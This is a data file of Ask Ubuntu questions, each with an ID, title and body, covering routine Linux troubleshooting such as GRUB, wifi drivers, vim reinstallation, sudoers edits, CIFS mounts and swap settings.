404031	can not change the amount of time before the screen turns off	i 'm using ubuntu 13.10 and i can not change the amount of time before the screen turns off . i access the settings and then the brightness & lock . i see a scrolling menu that looks like that : turn screen off when inactive for : 5 minutes now , i change it to : turn screen off when inactive for : never however , if i go back , the all the settings and then i return to brightness & lock , it still says 5 minutes ...
404034	mirror a xubuntu repo from a mac	is there some solution to mirror a the xubuntu official repositories from a mac computer ? i need it to copy the whole repo to an external hardrive and configure the repo locally to install softwares in a computer with xubuntu without internet conection .
404035	`` the ./boot/grub/efi.img file failed the md5 checksum verification . ''	related question : why does integrity check fail for the 12.04.1 alternate iso ? i downloaded and wrote ubuntu-12.04.3-server-amd64.iso to a usb key , but when i boot from it and select `` check disc for defects '' , i get the error : `` the ./boot/grub/efi.img file failed the md5 checksum verification ... '' i 'm using os x , so the steps for writing the iso to the usb key are as follows : hdiutil convert -format udrw -o ubuntu-12.04.3-server-amd64.img ubuntu-12.04.3-server-amd64.iso sudo dd if=ubuntu-12.04.3-server-amd64.img.dmg of=/dev/rdisk1 bs=1m diskutil eject /dev/disk1 the md5 for the ubuntu-12.04.3-server-amd64.iso is ok , md5 ubuntu-12.04.3-server-amd64.iso gives md5 ( ubuntu-12.04.3-server-amd64.iso ) = 2cbe868812a871242cdcdd8f2fd6feb9 which is the same as the md5 on the ubuntu website . is this the same issue as the question linked above ? can i proceed ok ?
404036	ubuntu 12.04 init wo n't re-read configuration	i 'm running a vnc server under control of init . this is configured using a file under /etc/init . so far , so good . now i want to make a change to the vnc.conf file , to change some of the command line options passed to the vnc server . the upstart documentation claims that upstart monitors /etc/init and will automatically pick up changes to the files there . however , i do n't see the vnc server being restarted . when i kill the vnc server manually , it is restarted with the same command line as before . clearly , upstart has not re-read the vnc.conf file . i tried everything i could think of to get it to re-read the configuration : kill -hup 1 , telinit q , initctl reload-configuration . for good measure , i manually killed the vnc server process after each of these attempts . all to no avail . the only way i have managed to get init to re-read the configuration is to reboot . clearly , i must be doing something wrong , but i have no idea what . can someone help ? n.b . i 'm using ubuntu 12.04 because of compatibility requirements at work . upgrading to a newer release is not an option at the moment .
404037	ca n't get wifi working on macbookair 2,1	i found this page ( https : //help.ubuntu.com/community/macbookair2-1/lucid ) that says that the macbook air is supported , but the page is very outdated and the newest version listed is lucid . i do n't know how to get internet as macbook airs do not have an ethernet port and i do n't have a usb wifi or ethernet card on me . any suggestions or tweaks that i can do to get this working . note : i need this to work off a flash drive , not after installation . this is for file recovery .
404038	xubuntu visudo sudoers edit not working	i have been trying to specify a script that i would like to run without being prompted for a password . after a number of google and stack searches and a number of different syntax changes , i still can not get it to work . one peculiar thing is that when typing sudo visudo nano is opened to edit the file . i never specified nano as the editor , but i may have first edited the file with nano . would that make nano the default editor ? if so , could that cause problems . thanks for the help . here is my sudoers file . # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults mail_badpass defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : $ # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all ) all pat all=nopasswd : /home/pat/test.sh # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d
404039	is it possible to move the dash home button ?	it 's a problem for me because i keep hitting that button when i do n't want to . for example , i accidentally click it when i want to : close a program minimise a program select a file on the desktop which is close to it its placement is quiet frustrating . about 2 years of using it , and i still keep clicking it accidentally when i do n't want to ... for example , microsoft windows moved the show desktop button to the other side so people would n't accidentally click the start button when trying to click the show desktop button . it 's a similar situation .
404042	computer freezes at load screen after package update 13.10	so today update manager popped up wanting to upgrade a few packages . i always like to look at the changelog and the package name . from what i remember there were only two things being upgraded and one was x11 ( presumbably it 's x that 's the problem ) . after it had finished i soon rebooted the pc . before the computer had actually turned off it shows you the ubuntu splash screen ( ubuntu logo with several dots ) . it froze there and would n't budge . i had to force restart and after doing so , and getting to the same splash screen , ( this time on booting up ) it froze again . so i 'm unable to get to my desktop . i also ca n't switch tty to get to a console . i can hit the power button on my tower and it will eventually turn it 's self off so it 's not completly frozen . i booted into recovery mode and dropped to console . i got the 'xserver-xorg7.7 ' and 'xserver-xorg-core1.14.3 ' from the ubuntu packages website and installed them but to no avail as it still freezes when booting up . i have an amd radeon 7790 with the latest beta driver ( 13.11 v9.95 ) which was working fine .
404043	how to cd into a directory with blanks ?	i have a directory called `` foo bar baz blob '' . how can i $ cd `` foo bar baz blob '' i have tried with quoting ( `` and ' ) and with escaping the blanks ( \ ) . it does not work . tab-completion does not work either . i also have to issue commands with filename arguments that contain spaces . how do i do that ? even midnightcommander ( mc ) fails in doing this .
404047	voip protocal for magic jack 's freetalk	does anyone know the protocol for freetalk ( an ipad app ) so that i can use my magic jack account on my linux box ? ?
404048	toshiba satellite s50-a	can i install ubuntu on this laptop ? where can i get drivers ? http : //www.toshiba.com/us/computers/laptops/satellite/s50
404052	trying to clean up my mbr 's	i curently have at least two grub 's installed on my hd . iá¸ż trying to use a couple of tools to configure the one currently in use ( i guess that is the one on /dev/sda ) . more precise , i want to load some live-cd .iso files using grml-rescueboot . to cut an even longer story short , i really only need one grub installed so all the tools hook up to this one automatically ( i hope ? ) e.g . delete , remove , annihilate the rest . i made a boot info dump here : http : //paste.ubuntu.com/6734499/ for anyone willing to take a look and help me out . thanks in advance ! jay bart cornelisse
404053	installing and uninstalling vim ?	have vim installed wanted auto complitions in vim so i downloaded the addon somehow i messed it up misplaced the files and it started giving the errors whenever i start vim so i decided to uninstall it and reinstall so it can be fixed but when i remove it with any of these commands sudo apt-get autoremove vim sudo apt-get -- purge autoremove vim sudo aptitude remove vim sudo aptitude purge vim and then sudo updatedb # updated the database sudo locate vim # located the vim files sudo rm -rf ( file/folder name ) # and removed those recursively followed the instruction of this answer after this all now when i uninstall the vim it gives th following warnings reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : vim 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 2,201 kb disk space will be freed . do you want to continue [ y/n ] ? y dpkg : warning : files list file for package 'vim-tiny ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'vim-runtime ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'vim-common ' missing ; assuming package has no files currently installed ( reading database ... 366893 files and directories currently installed . ) removing vim ... update-alternatives : using /usr/bin/vim.tiny to provide /usr/bin/vi ( vi ) in auto mode update-alternatives : warning : skip creation of /usr/share/man/man1/vi.1.gz because associated file /usr/share/man/man1/vim.1.gz ( of link group vi ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/fr/man1/vi.1.gz because associated file /usr/share/man/fr/man1/vim.1.gz ( of link group vi ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/it/man1/vi.1.gz because associated file /usr/share/man/it/man1/vim.1.gz ( of link group vi ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/ja/man1/vi.1.gz because associated file /usr/share/man/ja/man1/vim.1.gz ( of link group vi ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/pl/man1/vi.1.gz because associated file /usr/share/man/pl/man1/vim.1.gz ( of link group vi ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/ru/man1/vi.1.gz because associated file /usr/share/man/ru/man1/vim.1.gz ( of link group vi ) does n't exist update-alternatives : using /usr/bin/vim.tiny to provide /usr/bin/view ( view ) in auto mode update-alternatives : warning : skip creation of /usr/share/man/man1/view.1.gz because associated file /usr/share/man/man1/vim.1.gz ( of link group view ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/fr/man1/view.1.gz because associated file /usr/share/man/fr/man1/vim.1.gz ( of link group view ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/it/man1/view.1.gz because associated file /usr/share/man/it/man1/vim.1.gz ( of link group view ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/ja/man1/view.1.gz because associated file /usr/share/man/ja/man1/vim.1.gz ( of link group view ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/pl/man1/view.1.gz because associated file /usr/share/man/pl/man1/vim.1.gz ( of link group view ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/ru/man1/view.1.gz because associated file /usr/share/man/ru/man1/vim.1.gz ( of link group view ) does n't exist update-alternatives : using /usr/bin/vim.tiny to provide /usr/bin/ex ( ex ) in auto mode update-alternatives : warning : skip creation of /usr/share/man/man1/ex.1.gz because associated file /usr/share/man/man1/vim.1.gz ( of link group ex ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/fr/man1/ex.1.gz because associated file /usr/share/man/fr/man1/vim.1.gz ( of link group ex ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/it/man1/ex.1.gz because associated file /usr/share/man/it/man1/vim.1.gz ( of link group ex ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/ja/man1/ex.1.gz because associated file /usr/share/man/ja/man1/vim.1.gz ( of link group ex ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/pl/man1/ex.1.gz because associated file /usr/share/man/pl/man1/vim.1.gz ( of link group ex ) does n't exist update-alternatives : warning : skip creation of /usr/share/man/ru/man1/ex.1.gz because associated file /usr/share/man/ru/man1/vim.1.gz ( of link group ex ) does n't exist update-alternatives : using /usr/bin/vim.tiny to provide /usr/bin/rview ( rview ) in auto mode and when i install it again with sudo apt-get install vim it gives the warning similar mentioned above in the autoremove case update-alternatives : warning : skip creation of /usr/share/man/man1/view.1.gz because associated file /usr/share/man/man1/vim.1.gz ( of link group view ) does n't exist
404055	always show notifications in activity overview ( gnome shell 3.10 )	i want the notification bar to be always shown when i use activity overview . in some version of gnome shell ( maybe 3.2 or 3.4 ) it was by default so i was wondering if it can be done in gnome shell 3.10 ? p.s . why ? i really do n't want to be constantly checking notifications bar if i missed something . i would see if there is notifications when i am using activity overview to switch programs .
404060	juju bootstrap to cloudvps openstack machine has 3 ip 's	when bootstrapping to the new cloudvps beta openstack cloud , the bootstrap instance is getting three separate ip 's allocated to it . is this normal for juju to do or require when bootstrapping to openstack type or is this something on cloudvps side ? tried juju 1.7.0 and after that downgraded to 1.6.5 - happens with both .
404061	damaged mp4 file - ca n't extract audio	i 've been trying fruitlessly for a while now and gotten so frustrated i finally succumbed and decided to ask for help . i ask though because this file is very important , it is also important i know what is wrong . this happened at the camera 's end or while the memory card was being transported . ffprobe reported the following ( i gave it a huge maximum analyse duration - spelt with a z because it 's american of course : p ) avprobe version 0.8.9-4:0.8.9-0ubuntu0.12.04.1 , copyright ( c ) 2007-2013 the libav developers built on nov 9 2013 19:08:00 with gcc 4.6.3 input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from [ redacted ] : metadata : major_brand : 3gp4 minor_version : 0 compatible_brands : 3gp4isom creation_time : 2002-10-29 03:32:30 duration : 00:59:59.55 , start : 0.000000 , bitrate : 135 kb/s stream # 0.0 ( eng ) : video : mpeg4 , yuv420p , 320x240 [ par 1:1 dar 4:3 ] , 69 kb/s , 12.15 fps , 30 tbr , 1k tbn , 30 tbc metadata : creation_time : 2002-10-29 03:32:30 stream # 0.1 ( eng ) : audio : aac , 16000 hz , stereo , s16 metadata : creation_time : 2002-10-29 03:32:30 now anything i do ( to get ffmpeg/avconf to strip the audio ) results in ( as in the output from that copy ) an audio file that mplayer says contains no audio ( just the headers i would guess ) and is very small , infact when i try i get the same as the above ( output from ffprobe ) with this : output # 0 , adts , to 'hope.aac ' : metadata : major_brand : 3gp4 minor_version : 0 compatible_brands : 3gp4isom creation_time : 2002-10-29 03:32:30 encoder : lavf53.21.1 stream # 0.0 ( eng ) : audio : aac , 16000 hz , stereo metadata : creation_time : 2002-10-29 03:32:30 stream mapping : stream # 0:1 - > # 0:0 ( copy ) press ctrl-c to stop encoding size= 0kb time=10000000000.00 bitrate= 0.0kbits/s video:0kb audio:0kb global headers:0kb muxing overhead -nan % i am at my wits end , someone else to whom this file is also very important claims they have : recovered half of the file 's audio can make out `` about 1 word out of every 5 '' so that means there is an audio stream there . please help me to work out where/why this occurred so at the very least i can stop it happening again , and also ( obviously ) get what is there out of this file ! btw the content is much newer than 2002 , the camera 's clock is fairly accurate ( it has the right year to say the least : p ) not sure where it got that from .
404063	installing ubuntu with software raid 10	i just set up ubuntu 12.04.3 server lts with software raid 10 . here 's the steps i followed for setting up raid : 1 ) automatically partition one of the drives in order to determine the sizes of the partitions to create . in my case the suggested layout was : 1.0 mb free space 98.6 mb b efiboot 983.0 gb ext4 / 17.1 gb swap 2 ) change the / and swap partitions to : use for `` physical volume for raid '' . ubuntu would n't allow me to select a raid partition as bootable , so the efiboot partition can stay as-is . 3 ) partition the other 3 disks with exactly the same partition layout . i decided to leave 99.6 mb of free space at the beginning of each drive , so that there is a direct match between the four drives . ( so there are 98.6 mb unused partitions on each of the four drives ) . 4 ) set up the raid volumes . note : i could n't delete an existing raid volume because it was being used as swap . i ran this at the terminal : swapoff /dev/md127 http : //mikebeach.org/2013/10/25/ can not -delete-a-raid-swap-partition-during-ubuntu-installation/ 5 ) select the raid volumes , and use rd0 and rd1 for / and swap the system installed fine ok on the raid / partition , but when it rebooted grub just sits there at the grub > prompt . typing boot gives : `` error : no loaded kernel. '' . any help ?
404064	issues with fglrx and catalyst - have there been changes ?	i have never had any issues with amd proprietary drivers , but is seems maybe something has changed in ubuntu that is causing issues ? when switching to proprietary drivers the computer returns from reset saying it can not detect the graphics set up . i have options to look at some logs and drop to to tty . have tried fglrx and fglrx-updates , both the same . have downloaded catalyst and compiled manually from terminal for good measure - when i do this i can get to log in , but there after just get a blank screen and a cursor . anyone else having issues ? never had anything like this before .
404068	winxp isnt on the boot screen	i tried to boot into windows xp and noticed that it was n't in the boot menu . any suggestions on how to fix it ?
404069	touchpad with minimum functionality on macbook ( 13.10 )	i 'm having issues on a retina macbook retina . this is a re-install , i 've had better functionality before : only two finger scrolling works , no other additional features . i ca n't right click . i 'd like to middle click . it seems irratic . thanks dan
404071	dual booting ubuntu 13.10 with windows 7 from usb	i formatted my pc and installed win7 . i want to dual boot with ubuntu 13.10 with a 8gb usb stick . after i burn the iso file with `` iso to usb '' , restarted and i get this error : bootmgr is missing press any key to restart i tried formatting my usb by the type fat32 but it 's still not working . thanks for your time . any ideas ? edit # 2 : there is a checkbox `` bootable , only supports windows iso image. `` which the last time i left unchecked before burning .
404077	cifs mounting fails in ubuntu 13.10 tried with sec=ntlm and sec=ntlmv2	i have read just about every cifs mount question and sadly can not get a cifs share to mount . the command i am using works from a redhat machine but not from ubuntu 13.10 ( kernel 3.11.0-15-generic ) the command i use is sudo mount -t cifs //server01.mycompany.com/archive $ /structuralbiology/raw-data /home/rawdata2 -o user=hari.lastname , rw , soft , nosuid , uid=1000 , gid=1000 i have tried this with sec=ntlm , sec=ntlmv2 and it still does not work . the cifs command fails with : mount error ( 13 ) : permission denied refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) and dmesg has a message : [ 169895.357046 ] cifs vfs : cifs_mount failed w/return code = -13 [ 170370.733123 ] cifs vfs : cifs_read_super : get root inode failed i have spend days trying to find an answer and can not : any help or pointers will be greatly appreciated .
404078	my laptop wont load the updates	could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/ca.archive.ubuntu.com_ubuntu_dists_precise_multiverse_i18n_translation-en , e : the package lists or status file could not be parsed or opened . ' ^^^^ this is the message i receive when i click the top left corner of my screen and click 'software updater '
404086	minecraft exit code 134	so just starting the other day for some reason when i click play on the minecraft launcher it will close and re-open so i checked my development code and get this error : game ended with bad state ( exit code 134 ) so i looked it up and it appears as if i have to update my java . i currently use java open jdk7 runtime . since i did n't know how to update my java i have tried re-installing my .minecraft client and java , i still got the same error . i have ubuntu 12.04.3 and i would like to know how i would go about updating my java .
404091	what do you do when nvidia-cuda drivers break ubuntu ?	i wanted to try some cuda programming , so natually i installed all the nvidia-cuda* packages . after reboot , i can log in , but then there is only a black screen , and the cursor . even after i remove the packages from ctrl+alt+f2 terminal and reboot , i ca n't see anything after logging in - even as guest account .
404092	can not access to wi-fi 13.10	so i just upgrade 12.04 to 13.10 and since i can not connect to my wifi , it keep asking for password all the time i use a d-link and the encryption is wpa also my kernel is 3.11 and wifi card is asus pce-n15 i search on google and askubuntu but it seem nobody know how to fix it ... can anyone help with this , i can not use ethernet cable and wifi is my only option ...
404093	ethernet not working neither detected after trying to set up a hotspot	i 've try to set an adhoc hotspot , and since the built-in solution was n't working ( click `` use as hotspot ... '' in the network manager ) i 've tried a tutorial ( which i ca n't find -_- ) . the tutorial did n't work , and some time later , i 've unplugged the ethernet cable , and when i plugged it back , nothing happened . network manager display `` cable unplugged '' . since there was an upgrade , i 've done it , thinking maybe it would solve the problem ( my /home has its own partition , so i just installed the new release on the / ) but i still have the same problem , with this `` cable unplugged '' . i 've tried many things but none worked . i think the problem comes from when i tried to assign another ip to my eth0 ( not sure , that 's the problem with following tutorial and having no idea what we 're doing : / ) fortunately the wifi is just fine . here 's all i could think of checking , thanks in advance if you can help me : ) : mathieu @ mathieu-thinkpad-x220 ~ $ ifconfig eth0 link encap : ethernet hwaddr f0 : de : f1 : bf:3b : c2 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory : f2600000-f2620000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:277 errors:0 dropped:0 overruns:0 frame:0 tx packets:277 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:24392 ( 24.3 kb ) tx bytes:24392 ( 24.3 kb ) wlan0 link encap : ethernet hwaddr 10:0b : a9:6a : bd:08 inet addr:192.168.0.106 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :120b : a9ff : fe6a : bd08/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2643 errors:0 dropped:0 overruns:0 frame:0 tx packets:3248 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1850609 ( 1.8 mb ) tx bytes:428698 ( 428.6 kb ) mathieu @ mathieu-thinkpad-x220 ~ $ lspci -nnk | grep -ia2 net 00:19.0 ethernet controller [ 0200 ] : intel corporation 82579lm gigabit network connection [ 8086:1502 ] ( rev 04 ) subsystem : lenovo device [ 17aa:21ce ] kernel driver in use : e1000e -- 03:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6205 [ taylor peak ] [ 8086:0085 ] ( rev 34 ) subsystem : intel corporation centrino advanced-n 6205 agn [ 8086:1311 ] kernel driver in use : iwlwifi mathieu @ mathieu-thinkpad-x220 ~ $ ifconfig -a eth0 link encap : ethernet hwaddr f0 : de : f1 : bf:3b : c2 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory : f2600000-f2620000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:583 errors:0 dropped:0 overruns:0 frame:0 tx packets:583 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:49126 ( 49.1 kb ) tx bytes:49126 ( 49.1 kb ) wlan0 link encap : ethernet hwaddr 10:0b : a9:6a : bd:08 inet addr:192.168.0.106 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :120b : a9ff : fe6a : bd08/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5892 errors:0 dropped:0 overruns:0 frame:0 tx packets:7361 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3983414 ( 3.9 mb ) tx bytes:922793 ( 922.7 kb ) mathieu @ mathieu-thinkpad-x220 ~ $ cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback mathieu @ mathieu-thinkpad-x220 ~ $ lsmod module size used by joydev 17377 0 parport_pc 32701 0 ppdev 17671 0 rfcomm 69070 0 bnep 19564 2 bluetooth 371874 10 bnep , rfcomm binfmt_misc 17468 1 x86_pkg_temp_thermal 14162 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm 431315 0 crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13259 0 aesni_intel 55624 1 aes_x86_64 17131 1 aesni_intel lrw 13257 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20329 3 ghash_clmulni_intel , aesni_intel , ablk_helper dm_multipath 22843 0 scsi_dh 14882 1 dm_multipath snd_hda_codec_hdmi 41276 1 snd_hda_codec_conexant 56945 1 microcode 23518 0 arc4 12608 2 iwldvm 237440 0 psmouse 97626 0 serio_raw 13413 0 mac80211 596969 1 iwldvm snd_hda_intel 48171 3 snd_hda_codec 188738 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel lpc_ich 21080 0 snd_hwdep 13602 1 snd_hda_codec snd_pcm 102033 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel iwlwifi 165398 1 iwldvm uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo cfg80211 479757 3 iwlwifi , mac80211 , iwldvm videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40469 1 uvcvideo videodev 133390 2 uvcvideo , videobuf2_core thinkpad_acpi 80701 0 snd_page_alloc 18710 2 snd_pcm , snd_hda_intel nvram 14362 1 thinkpad_acpi snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30095 1 snd_seq_midi mei_me 18421 0 mei 77692 1 mei_me snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29433 2 snd_pcm , snd_seq snd 69141 18 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , thinkpad_acpi , snd_seq_device , snd_seq_midi tpm_tis 19123 0 soundcore 12680 1 snd mac_hid 13205 0 lp 17759 0 parport 42299 3 lp , ppdev , parport_pc dm_mirror 22056 0 dm_region_hash 20784 1 dm_mirror dm_log 18411 2 dm_region_hash , dm_mirror i915 655752 3 i2c_algo_bit 13413 1 i915 sdhci_pci 18985 0 drm_kms_helper 52651 1 i915 sdhci 42630 1 sdhci_pci drm 296739 4 i915 , drm_kms_helper ahci 25819 3 libahci 31898 1 ahci e1000e 250025 0 ptp 18580 1 e1000e pps_core 19027 1 ptp wmi 19070 0 video 19318 1 i915 mathieu @ mathieu-thinkpad-x220 ~ $ cat /etc/udev/rules.d/70-persistent-net.rules # this file was automatically generated by the /lib/udev/write_net_rules # program , run by the persistent-net-generator.rules rules file . # # you can modify it , as long as you keep each rule on a single # line , and change only the value of the name= key . # pci device 0x8086:0x1502 ( e1000e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' f0 : de : f1 : bf:3b : c2 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x8086:0x0085 ( iwlwifi ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 10:0b : a9:6a : bd:08 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 ''
404094	synaptic touchpad want no movement in button area 12.04 lts	i want to change my touchpad/synclient settings so that the mouse pointer does not move in the area at the bottom where the buttons are . how would i do this on 12.04 lts ? edit : i achieved the desired behavior by changing areabottomedge = 0 using the command synclient areabottomedge=3900 but at the ( unacceptable ) cost of the right mouse button behaving like the left mouse button . user @ notebook : ~ $ synclient parameter settings : leftedge = 1766 rightedge = 5378 topedge = 1627 bottomedge = 4331 fingerlow = 25 fingerhigh = 30 fingerpress = 256 maxtaptime = 180 maxtapmove = 230 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 0 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 104 horizscrolldelta = 104 vertedgescroll = 1 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 0 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0381316 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 419 edgemotionusealways = 0 touchpadoff = 2 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 3 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 8 verthysteresis = 8 clickpad = 1 rightbuttonarealeft = 3572 rightbuttonarearight = 0 rightbuttonareatop = 3984 rightbuttonareabottom = 0 middlebuttonarealeft = 0 middlebuttonarearight = 0 middlebuttonareatop = 0 middlebuttonareabottom = 0
404096	with an ssd , do i need to change my swappiness to increase ssd life ?	i encountered this article which includes the following suggestion : swap and swappiness i kept my swap partition on the old hdd . swap on the ssd would be faster , but would also shorten the ssdâs life . my system has plenty of memory , so i also reduced the swappiness value to 0 to tell ubuntu to only swap when absolutely necessary . i did this by adding the line vm.swappiness=0 to /etc/sysctl.conf . is it true that setting swappiness to zero will increase the life of my ssd ? i ca n't find references to this elsewhere .
404099	why is the default ubuntu swappiness 60 ?	what is the reasoning for ubuntu 's default swappiness being 60 ?
404100	13.10 problems with automount	i have recently updated to 13.10 and there is no automount for usb devices , unable to shutdown/reboot from the menu , etc . i know about the thread : ( upgrade to 13.10 - can not auto-mount drives ) but that gives me no help . the link in one of the answers ( https : //bugs.launchpad.net/ubuntu/+b ... /+affectsmetoo ) does not exist any more . does anyone know how to solve this ?
404101	maas “blocked for more than 120 seconds” error when provisioning a node	i created a maas server and a node . when i boot ( through pxe ) the virtual machine corresponding to this node , it starts loading ubuntu . a few minutes later , it is stuck in what seems to be an infinite loop , printing regularly the following message : [ 239.617011 ] info : task touch:1060 blocked for more than 120 seconds . [ 239.618857 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . the same message ( only the number at the beginning change ) is repeated , over and over . i kept it running for probably more than half an hour , and the result is the same . this results in “failed tests” status for the concerned node . the error appears both when using default installer and fast installer . the file /var/log/maas/maas.log contains no errors . where can i gather more information about the cause of this issue ?
404103	functional onscreen keyboard ?	is there a better ubuntu keyboard app than onboard , one that is a decent competitor to the features of android or microsoft virtual keyboards ? specifically , i 'd expect : multi-touch : so you can hold shift with one finger , and hit a key with another . ( onboard lacks ) word completion/suggestion , with suggested words above keyboard . intelligent autohide . this is present in onboard with accessibility settings , but far from perfect . it would be better if , like android/windows8 , the item in the foreground moved or resized as the keyboard appeared , so the box you 're typing in is n't obscured by the keyboard . swype-like behavior to guess words by a path across the keyboard . without these features , i really find a virtual keyboard a difficult replacement . i found this great chart via the florence virtual keyboard site : table 1 . keyboards features+ -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- -- -- -+ -- -- -- -- -- -- + -- -- -- -- -- + -- -- -- -- -- -- -- -- -+ | keyboard | transparency | auto hide | auto click | scanning | word completion | + -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- -- -- -+ -- -- -- -- -- -- + -- -- -- -- -- + -- -- -- -- -- -- -- -- -+ | florence | yes | yes | yes | no | no | | gok | no | yes | yes | yes | yes | | xvkbd | no | no | yes | no | yes | | onboard | no | no | yes | no | no | + -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- -- -- -+ -- -- -- -- -- -- + -- -- -- -- -- + -- -- -- -- -- -- -- -- -+ however , the suggestions like gok which appear to have a lot to offer , seem to be 404 links and are dead in the repos . with all the windows 8 machines that have touch pads , there must be some very slick open source apps for this now , right ? quite frankly , i 'd even buy a non-free one if it could mimic android well . ( and there are a ton in the google play store , so this might not be too hard ? )
404107	external harddrive not recognized	i have a 500gb usb harddrive . it works with other computers and i have swapped the cable around with others . i have ran dmesg and it says that a seagate is inserted but it still does not come up . please help .
404108	unable to find any of my applications in dash ?	i am new in ubuntu . i have ubuntu 13.10 and i try to access installed application but dash will not show me any . i can see them installed in software center but when i search through dash i get nothing under any filter . secondary question : how do i customize dash so it does not show me all of songs when i search for an application ?
404109	can i set up ubuntu server openstack for a private cloud on a single computer with two hard drives ?	that 's all there is to it i guess . all i need to know is is it possible , and is it hard ?
